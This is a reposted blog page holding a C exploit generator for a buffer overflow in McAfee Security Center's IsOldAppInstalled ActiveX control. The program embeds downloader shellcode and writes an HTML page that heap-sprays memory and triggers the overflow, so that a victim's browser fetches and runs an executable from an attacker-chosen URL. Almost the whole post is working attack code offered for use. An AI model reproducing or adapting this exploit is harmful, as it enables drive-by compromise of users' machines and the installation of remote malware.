McAfee Security Center IsOldAppInstalled ActiveX Buffer Overflow Vulnerability

最新推荐文章于 2014-11-29 16:27:00 发布

iiprogram

最新推荐文章于 2014-11-29 16:27:00 发布

阅读量965

点赞数

文章标签： security buffer fp url file header

/*
	McAfee Security Center IsOldAppInstalled ActiveX Buffer Overflow Vulnerability
	
	Peel the frame from axis,Thanks
	
	Test on Windows2000 and dll version Mcsubmgr.dll 6.0.0.15

	Greetz to OYXin, sowhat, Winny Thomas and 0x557 team
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

FILE *fp = NULL;
char *file = "McAfee_exploit.html";
char *url = NULL;

//Downloader shellcode
unsigned char sc[] = 
"/xEB/x10/x5B/x4B/x33/xC9/x66/xB9/x3c/x01/x80/x34/x0B/x99/xE2/xFA"
"/xEB/x05/xE8/xEB/xFF/xFF/xFF/x70/x34/x99/x99/x99/xC3/x12/x6B/xAA"
"/x59/x35/xA4/x01/x99/x99/x99/xEC/x6F/x18/x75/x51/x99/x99/x99/x12"
"/x6D/x10/xCF/xBD/x71/x0C/x99/x99/x99/xAA/x42/x10/x9F/x66/xAF/xF1"
"/x17/xD7/x97/x75/x71/x34/x99/x99/x99/x10/xDF/x91/xF1/xF5/xF5/x99"
"/x99/xF1/xF6/xF7/xB7/xFD/xF1/xEC/xEB/xF5/xF4/xCD/x66/xCF/x91/x10"
"/xDF/x9D/x66/xAF/xF1/xE7/x41/x7B/xEA/x71/x11/x99/x99/x99/x10/xDF"
"/x95/x66/xAF/xF1/x01/x67/x13/x97/x71/xE0/x99/x99/x99/x10/xDF/x8D"
"/x66/xAF/xF1/xBC/x29/x66/x5B/x71/xF3/x99/x99/x99/x10/xDF/x81/x66"
"/xEF/x9D/xF1/xAF/x83/xB6/xE9/x71/xC3/x99/x99/x99/x10/xDF/x89/xF3"
"/xFC/xF1/xEA/xB7/xFC/xE1/x10/xFF/x85/x66/xEF/x85/x66/xCF/x81/xAA"
"/x50/xC8/xC8/x66/xEF/x85/x66/xEF/xBD/xC8/x66/xCF/x89/xAA/x50/xC8"
"/x66/xEF/x85/x66/xCF/x8D/x66/xCF/x95/x70/x19/x99/x99/x99/xCC/xCF"
"/xFD/x38/xA9/x99/x99/x99/x1C/x59/xE1/x95/x12/xD9/x95/x12/xE9/x85"
"/x34/x12/xF1/x91/x72/x90/x12/xD9/xAD/x12/x31/x21/x99/x99/x99/x12"
"/x5C/xC7/xC4/x5B/x9D/x99/xCA/xCC/xCF/xCE/x12/xF5/xBD/x81/x12/xDC"
"/xA5/x12/xCD/x9C/xE1/x9A/x4C/x12/xD3/x81/x12/xC3/xB9/x9A/x44/x7A"
"/xAB/xD0/x12/xAD/x12/x9A/x6C/xAA/x66/x65/xAA/x59/x35/xA3/x5D/xED"
"/x9E/x58/x56/x94/x9A/x61/x72/x6B/xA2/xE5/xBD/x8D/xEC/x78/x12/xC3"
"/xBD/x9A/x44/xFF/x12/x95/xD2/x12/xC3/x85/x9A/x44/x12/x9D/x12/x9A"
"/x5C/x72/x9B/xAA/x59/x12/x4C/xC6/xC7/xC4/xC2/x5B/x9D/x99/x71/x50"
"/x67/x66/x66";
unsigned char sc_2[] = "/x98";

char * header =
"<!-- McAfee exploit:) Jambalaya-->/n/n"

"<html>/n"
"<object classid=/"clsid:9BE8D7B2-329C-442A-A4AC-ABA9D7572602/" id='target'></object>/n"
"<body>/n"
"<SCRIPT language=/"javascript/">/n"
"/tvar heapSprayToAddress = 0x05050505;/n"
"/tvar shellcode = unescape(/"%u9090/"+/"%u9090/"+ /n";




char * footer =
"/n"
"var heapBlockSize = 0x400000;/n" 
"var payLoadSize = shellcode.length * 2;/n"
"var spraySlideSize = heapBlockSize - (payLoadSize+0x38);/n"
"var spraySlide = unescape(/"%u0505%u0505/");/n"
"spraySlide = getSpraySlide(spraySlide,spraySlideSize);/n"
"heapBlocks = (heapSprayToAddress - 0x400000)/heapBlockSize;/n"
"memory = new Array();/n/n"
"for (i=0;i<heapBlocks;i++)/n{/n"
"/t/tmemory[i] = spraySlide + shellcode;/n}/n"

"var padding = String.fromCharCode(0x05);/n"
"while( padding.length< 500)/n"
"{/npadding +=padding;/n}/n"
"var str = padding.substring(0,500);/n"
"var arg2=/"defaultV/";/n"
"target.IsOldAppInstalled(str, arg2);/n" 

"function getSpraySlide(spraySlide, spraySlideSize)/n{/n/t"
"while (spraySlide.length*2<spraySlideSize)/n/t"
"{/n/t/tspraySlide += spraySlide;/n/t}/n"
"/tspraySlide = spraySlide.substring(0,spraySlideSize/2);/n/treturn spraySlide;/n}/n/n"
"</script>/n";



char * trigger_1 =
"</body>/n"
"</html>/n";


// print unicode shellcode
void PrintPayLoad(char *lpBuff, int buffsize)
{
int i;
for(i=0;i<buffsize;i+=2)
{
if((i%16)==0)
{
if(i!=0)
{
printf("/"/n/"");
fprintf(fp, "%s", "/" +/n/"");
}
else
{
printf("/"");
fprintf(fp, "%s", "/"");
}
}

printf("%%u%0.4x",((unsigned short*)lpBuff)[i/2]);

fprintf(fp, "%%u%0.4x",((unsigned short*)lpBuff)[i/2]);
}

printf("/";/n");
fprintf(fp, "%s", "/");/n"); 


fflush(fp);
}




void main(int argc, char **argv)
{
unsigned char buf[1024] = {0};

int sc_len = 0;
int n;


if (argc < 2)
{
	printf("#######################################/n");
	printf("#/tMcAfee Security Center IsOldAppInstalled exploit by Jambalaya:>/n");
	printf("#/ttest on Windows2000 and dll version Mcsubmgr.dll 6.0.0.15:>/n");
	printf("#/tReference : http://lists.grok.org.uk/pipermail/full-disclosure/2007-May/054183.html/n");
	printf("#/t100%% successful/? who knows/;/)/n");
	printf("/r/nUsage: %s <URL> [htmlfile]/n", argv[0]);
	printf("/r/nE.g.: %s http://www.fakename.com/hello.exe exploit.html/r/n/n", argv[0]);
exit(1);
}

url = argv[1];


if( (!strstr(url, "http://") && !strstr(url, "ftp://")) || strlen(url) < 10)
{
printf("[-] Invalid url. Must start with 'http://','ftp://'/n");
return; 
}

printf("[+] download url:%s/n", url);

if(argc >=3) file = argv[2];
printf("[+] exploit file:%s/n", file);

fp = fopen(file, "w");
if(!fp)
{
printf("[-] Open file error!/n");
return;
} 


//build evil html file
fprintf(fp, "%s", header);
fflush(fp);

memset(buf, 0, sizeof(buf));
sc_len = sizeof(sc)-1;
memcpy(buf, sc, sc_len);
memcpy(buf+sc_len, url, strlen(url));

sc_len += strlen(url);

memcpy(buf+sc_len, sc_2, 1);
sc_len += 1;

PrintPayLoad((char *)buf, sc_len);

fprintf(fp, "%s", footer);
fflush(fp); 

fprintf(fp, "%s", trigger_1);
fflush(fp); 


printf("[+] exploit write to %s success!/n", file);
}

iiprogram

关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
McAfee Security Center IsOldAppInstalled ActiveX Buffer Overflow Vulnerability

/* McAfee Security Center IsOldAppInstalled ActiveX Buffer Overflow Vulnerability Peel the frame from axis,Thanks Test on Windows2000 and dll version Mcsubmgr.dll 6.0.0.15 Greetz to OYXin, sowhat, W
复制链接

扫一扫